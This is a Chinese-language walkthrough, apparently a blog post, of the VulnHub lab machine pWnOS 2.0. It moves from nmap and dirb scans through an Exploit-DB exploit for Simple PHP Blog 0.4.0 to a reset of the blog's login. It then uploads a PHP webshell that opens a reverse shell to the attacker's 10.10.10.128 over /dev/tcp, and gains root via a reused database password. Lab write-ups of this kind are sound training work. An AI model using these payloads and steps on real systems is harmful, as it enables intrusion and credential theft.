目录
# 学习环境准备
靶机下载地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub
攻击机Kali IP:10.10.10.128
一、总结
1.1 主机发现
sudo nmap -sn 10.10.10.0/24
1.2.1 端口开放情况扫描
sudo nmap -sT --min-rate=10000 -p- 10.10.10.100
1.2.2 UDP端口开放情况扫描
sudo nmap -sU --min-rate=10000 -p- 10.10.10.100
1.3 端口详细信息扫描
sudo nmap -sT -sV -O -p22,80 10.10.10.100
1.4 nmap漏洞脚本扫描
sudo nmap --script=vuln -p22,80 10.10.10.100
1.5 目录扫描
dirb http://10.10.10.100
2.1 80页面漏洞查找
2.2 根据nmap漏洞脚本扫描和目录扫描的结果发现新的目录/blog,查看页面源码发现 Simple PHP Blog 0.4.0 CMS
2.3 Simple PHP Blog 0.4.0 CMS可利用漏洞查找及分析
2.4 利用漏洞创建新的用户
2.5 登录网站利用文件上传getshell
3.1 服务器可利用漏洞查找
3.2 查找到mysql数据库连接文件,连接数据库查找可利用信息,虽然发现用户名密码,但是并连接不上
3.3 换个思路,使用数据库连接信息中的密码ssh服务器,成功获取root权限
二、详细过程
1. 信息收集
1.1 主机发现
sudo nmap -sn 10.10.10.0/24
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nmap -sn 10.10.10.0/24
[sudo] password for halo:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 09:23 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00045s latency).
MAC Address: 00:50:56:F9:18:61 (VMware)
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
MAC Address: 00:0C:29:F1:B9:7E (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00042s latency).
MAC Address: 00:50:56:FC:D4:76 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.17 seconds
1.2.1 TCP端口开放情况扫描
sudo nmap -sT --min-rate=10000 -p- 10.10.10.100
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nmap -sT --min-rate=10000 -p- 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 09:23 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:F1:B9:7E (VMware)Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds
1.2.2 UDP端口开放情况扫描
扫描完TCP端口后我们也扫描一下UDP端口,有时候TCP端口没有进展,UDP端口可能会找到我们想要的东西。
sudo nmap -sU --min-rate=10000 -p- 10.10.10.100
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nmap -sU --min-rate=10000 -p- 10.10.10.100
[sudo] password for halo:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 09:31 EDT
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.0011s latency).
All 65535 scanned ports on 10.10.10.100 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:F1:B9:7E (VMware)Nmap done: 1 IP address (1 host up) scanned in 74.86 seconds
1.3 端口详细信息扫描
sudo nmap -sT -sV -O -p22,80 10.10.10.100
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 09:27 EDT
Nmap scan report for 10.10.10.100
Host is up (0.0011s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:F1:B9:7E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.76 seconds
1.4 nmap漏洞脚本扫描
sudo nmap --script=vuln -p22,80 10.10.10.100
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nmap --script=vuln -p22,80 10.10.10.100
[sudo] password for halo:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-24 09:30 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.100
Host is up (0.00095s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
| httponly flag not set
| /login/:
| PHPSESSID:
| httponly flag not set
| /index/:
| PHPSESSID:
| httponly flag not set
| /register/:
| PHPSESSID:
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.100:80/login.php
| Form id:
| Form action: login.php
|
| Path: http://10.10.10.100:80/register.php
| Form id:
|_ Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /blog/: Blog
| /login.php: Possible admin folder
| /login/: Login page
| /info.php: Possible information file
| /icons/: Potentially interesting folder w/ directory listing
| /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
| /index/: Potentially interesting folder
| /info/: Potentially interesting folder
|_ /register/: Potentially interesting folder
MAC Address: 00:0C:29:F1:B9:7E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 57.00 seconds
1.5 目录扫描
服务器开放80端口,进行目录扫描
dirb http://10.10.10.100
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ dirb http://10.10.10.100
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Apr 24 09:43:57 2024
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5896)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5646)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4930)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5288)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Apr 24 09:44:05 2024
DOWNLOADED: 9224 - FOUND: 30
2. 80端口Web服务渗透测试
2.1 web页面漏洞查找
访问80页面,没什么发现
刚刚nmap漏洞脚本扫描时发现了/blog,目录扫描结果里面也有该路径,访问该路径,发现一些新的web页面
http://10.10.10.100/blog/stats.php
没发现可利用的地方,查看页面源码
在页面源码发现Powered by Simple PHP Blog 0.4.0,像是某个CMS的版本,浏览器搜索确认是CMS,并存在相关漏洞
2.2 searchsploit查找是否存在可利用漏洞
“searchsploit” 是一个命令行工具,用于搜索 Exploit Database(Exploit-DB)。Exploit-DB 是一个开源的漏洞利用代码和相关安全资源的存储库,由 Offensive Security 维护。通过 "searchsploit",你可以在本地系统中搜索 Exploit-DB 中的漏洞利用代码和其他资源。
// 在本地漏洞库(kali中会存储一份Exploit-DB漏洞信息,需要经常更新kali已获得最新漏洞库)搜索需要查找的漏洞信息,速度比较快
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo searchsploit Simple PHP Blog 0.4.0
有2个Blog 0.4.0相关漏洞,最后一个16883显示需要使用metasploit工具(msf),我们尽量不选择直接使用工具利用漏洞,因为利用工具我们往往不能弄清楚漏洞的原理,一般工具直接就利用成功了。
我们是以学习为目的,所以先选择第一个1191,如果利用不成功再选择16883。
sudo searchsploit Simple PHP Blog 0.4.0 -m 1191
使用了
searchsploit工具来搜索 Exploit Database(Exploit-DB)中的漏洞利用,然后将其镜像(复制)到当前目录。
-m是镜像选项,表示将漏洞利用代码复制到当前目录。1191是 Exploit Database 的漏洞利用编号(EDB-ID)。
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo searchsploit Simple PHP Blog 0.4.0 -m 1191
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #0
Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
URL: https://www.exploit-db.com/exploits/1191
Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
Codes: OSVDB-19070, CVE-2005-2787, OSVDB-19012, CVE-2005-2733, OSVDB-17779, CVE-2005-2192
Verified: True
File Type: Perl script text executable
Copied to: /home/halo/Vulnhub/pWnOS2.0/1191.pl
2.3 分析漏洞脚本
我们刚才下载的漏洞脚本文件是.pl结尾
2.3.1 .pl文件的特点及运行方式
.pl 文件的特点
- 文本文件:
.pl文件通常是纯文本文件,包含 Perl 代码。 - 脚本用途:可以用于自动化任务、数据处理、系统管理、网络操作等。
- 跨平台:Perl 脚本可以在多种操作系统上运行,包括 Linux、Windows 和 macOS。
如何运行 .pl 文件
-
Linux/macOS:通常自带 Perl 解释器。可以使用
perl命令运行.pl文件perl myscript.pl -
你也可以赋予脚本执行权限,然后直接运行
chmod +x myscript.pl
./myscript.p
2.3.2 分析漏洞脚本文件
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ cat 1191.pl
https://www.exploit-db.com/exploits/1191脚本文件中重点信息,脚本利用方式
Usage : $0 [-h host] [-e exploit]
-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System FileExamples: $0 -h 127.0.0.1 -e 2
$0 -h 127.0.0.1 -e 3 -U l33t -P l33t
$0 -h 127.0.0.1 -e 4 -F ./index.php
$0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
$0 -h 127.0.0.1 -e 1
-?:显示帮助菜单或用法说明。通常用于提供脚本的帮助信息。
-h:用于指定目标主机的地址(例如,IP 地址或域名)。
-e:选择漏洞利用操作。下面是可能的选项:
(1):上传文件cmd.php到[site]/images/目录。这可能是一个漏洞利用操作,涉及向目标网站上传文件。(2):检索密码文件或哈希。这可能涉及提取敏感信息。(3):设置新的用户名和密码。这个选项有额外的参数:
-U:指定新的用户名。-P:指定新的密码。(4):删除系统文件。这是一个危险的操作,用于删除特定的系统文件。
-F:指定要删除的系统文件的路径。
2.4 漏洞利用
2.4.1 漏洞利用路径分析
尝试-e参数的第2种利用方式,查看密码hash,看该漏洞是否可以利用
./1191.pl -h 10.10.10.100 -e 2
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ./1191.pl -h 10.10.10.100 -e 2
Can't locate Switch.pm in @INC (you may need to install the Switch module) (@INC entries checked: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.38.2 /usr/local/share/perl/5.38.2 /usr/lib/x86_64-linux-gnu/perl5/5.38 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.38 /usr/share/perl/5.38 /usr/local/lib/site_perl) at ./1191.pl line 146.
BEGIN failed--compilation aborted at ./1191.pl line 146.
报错,搜索一下报错信息
找到相似的报错信息,根据解决方式安装缺失的模块
sudo apt-get install libswitch-perl
安装完成,尝试进行漏洞利用
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ./1191.pl -h 10.10.10.100 -e 2________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________
Running Username and Password Hash Retrieval Exploit....Failed to POST '10.10.10.100/config/password.txt': 400 URL must be absolute at ./1191.pl line 295.
报错,提示没找到password.txt文件,可能是利用路径不对,该漏洞是我们在/blog目录下发现的,尝试使用该路径再次利用
./1191.pl -h http://10.10.10.100/blog -e 2
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ./1191.pl -h http://10.10.10.100/blog -e 2________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________
Running Username and Password Hash Retrieval Exploit....
Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
*** Exploit Completed....
Have a nice day! :)
Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
发现一串密码hash值,但没说明是那个用户,没什么用,但证明该漏洞可以利用。
2.4.2 利用漏洞创建新用户
继续尝试-e参数的第3种利用方式,创建一个新的用户
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U halo7 -P halo
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ perl 1191.pl -h http://10.10.10.100/blog -e 3 -U halo7 -P halo_____________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
______________________________________________________________________
Running Set New Username and Password Exploit....
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: halo7
Password is set to: halo
*** Exploit Completed....
Have a nice day! :)
提示创建成功,用户名halo7,密码halo,登录网站
2.4.3 利用文件上传getshell
成功登录网站 ,发现有一个文件上传的页面,尝试上传webshell
使用一句话木马制作一个webshell
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ vim haloshell.php
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ cat haloshell.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'") ;?>
上传成功,跳转至首页
nc监听1234端口,访问上传文件的路径,之前目录扫描时已经发现/blog/images路径
==> DIRECTORY: http://10.10.10.100/blog/images/ 
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo nc -nvlp 1234
[sudo] password for halo:
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 42910
bash: no job control in this shell
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ pwd
pwd
/var/www/blog/images
www-data@web:/var/www/blog/images$ uname -a
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
www-data@web:/var/www/blog/images$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:f1:b9:7e brd ff:ff:ff:ff:ff:ff
inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
inet6 fe80::20c:29ff:fef1:b97e/64 scope link
valid_lft forever preferred_lft forever
www-data@web:/var/www/blog/images$
成功获取低级别用户权限,准备提权
3. 权限提升
3.1 服务器可利用信息查找
sudo -l 发现不行,需要有tty
使用python开一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
继续sudo -l,不知道密码
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@web:/var/www/blog/images$ python -c "import pty;pty.spawn('/bin/bash')"
<images$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
[sudo] password for www-data: 123Sorry, try again.
[sudo] password for www-data: 123Sorry, try again.
[sudo] password for www-data: 123Sorry, try again.
sudo: 3 incorrect password attempts
www-data@web:/var/www/blog/images$
切换到/var/www目录下,发现存在 mysqli_connect.php文件,查看该文件,该文件一般存放mysql数据库配置信息,会存在数据库用户名密码信息
www-data@web:/var/www$ ls -liah
ls -liah
total 44K
263594 drwxr-xr-x 4 root root 4.0K May 9 2011 .
261633 drwxr-xr-x 16 root root 4.0K May 7 2011 ..
261763 -rw-r--r-- 1 root root 1.4K Mar 24 2008 activate.php
261648 drwxrwxrwx 11 root root 4.0K May 9 2011 blog
261758 drwxr-xr-x 2 root root 4.0K May 7 2011 includes
261764 -rw-r--r-- 1 root root 629 May 7 2011 index.php
261765 -rw-r--r-- 1 root root 23 Apr 3 2008 info.php
261766 -rw-r--r-- 1 root root 3.1K May 7 2011 login.php
261767 -rw-r--r-- 1 root root 516 Apr 2 2008 mysqli_connect.php
261768 -rw-r--r-- 1 root root 4.6K Apr 2 2008 register.php
www-data@web:/var/www$ pwd
pwd
/var/wwwwww-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>www-data@web:/var/www$
发现数据库用户名root,密码goodday,尝试连接数据库
www-data@web:/var/www$ mysql -u root -p
mysql -u root -p
Enter password: gooddayERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
连接不上,应该是密码错误,有可能是这个数据库连接文件已经被弃用,尝试搜索看是否存在其他数据库连接文件
www-data@web:/var/www$ find / -name mysqli_connect.php 2>/dev/null
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
果不其然,/var路径下存在另一个数据库连接文件,查看该文件
www-data@web:/var/www$ cd /var
cd /var
www-data@web:/var$ ls
ls
backups crash lib lock mail opt spool uploads
cache index.html local log mysqli_connect.php run tmp www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
发现数据库用户名root,密码root@ISIntS,再次尝试连接数据库
3.2 mysql数据库可利用信息查找
www-data@web:/var$ mysql -u root -p
mysql -u root -p
Enter password: root@ISIntSWelcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 47
Server version: 5.1.54-1ubuntu4 (Ubuntu)Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 licenseType 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| ch16 |
| mysql |
+--------------------+
3 rows in set (0.00 sec)mysql> use ch16;
use ch16;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+----------------+
| Tables_in_ch16 |
+----------------+
| users |
+----------------+
1 row in set (0.00 sec)mysql> select * from users;
select * from users;
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| user_id | first_name | last_name | email | pass | user_level | active | registration_date |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
| 1 | Dan | Privett | admin@isints.com | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | 0 | NULL | 2011-05-07 17:27:01 |
+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+
1 row in set (0.00 sec)mysql>
发现用户信息
使用hash-identifie判断下类型
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ sudo hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'
[sudo] password for halo:
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
找一个网站进行解密
c2c4b4e51d9e23c02c15702c136c3e950ba9a4af:killerbeesareflying
尝试ssh
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ssh Dan@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
Dan@10.10.10.100's password:
Permission denied, please try again.
Dan@10.10.10.100's password:
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ssh admin@10.10.10.100
admin@10.10.10.100's password:
Permission denied, please try again.
admin@10.10.10.100's password:
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Permission denied, please try again.
root@10.10.10.100's password:
失败失败失败,查看一下/etc/passwd,看还有哪些用户
www-data@web:/var$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:0:0:MySQL Server,,,:/root:/bin/bash
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:104:110::/var/lib/landscape:/bin/false
dan:x:1000:1000:Dan Privett,,,:/home/dan:/bin/bash
www-data@web:/var$
3.3 更换思路,获得root权限
好像也没别的用户了,回想一下,第一次查看到的数据库连接文件中的数据库密码就是错误的,那有没有可能第二次查找的的数据库连接文件的密码就是登录密码呢?
事实上很多用户喜欢在各种地方设置同样的密码,方便记忆、
尝试使用root,密码root@ISIntS进行ssh
┌──(halo㉿HaloKali)-[~/Vulnhub/pWnOS2.0]
└─$ ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)* Documentation: http://www.ubuntu.com/server/doc
System information as of Wed Feb 28 19:06:19 EST 2024
System load: 0.0 Processes: 81
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 14% IP address for eth0: 10.10.10.100
Swap usage: 0%Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
link/ether 00:0c:29:f1:b9:7e brd ff:ff:ff:ff:ff:ff
inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
inet6 fe80::20c:29ff:fef1:b97e/64 scope link
valid_lft forever preferred_lft forever
root@web:~#
哇!猜对了,成功拿到root权限,积累一份渗透测试思路
4287
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
